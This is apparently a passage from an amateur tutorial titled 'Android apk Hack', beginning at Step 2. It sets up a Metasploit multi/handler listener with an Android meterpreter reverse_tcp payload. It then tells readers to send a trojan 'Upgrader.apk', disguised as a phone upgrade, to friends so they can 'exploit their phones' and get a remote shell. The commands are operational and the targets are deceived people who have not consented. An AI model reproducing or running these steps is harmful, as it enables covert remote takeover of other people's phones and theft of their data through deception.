Android apk Hack
Step 2: Open Another Terminal:
- Open another terminal until the file is being produced.
- Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
- After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
- Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
- To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
- At last type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
- Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
- Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
- However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
- And when he clicks Open...
Step 5: BOOM!
There comes the meterpreter prompt:
Keep coming for more!
Some post modules that work for windows might not work in android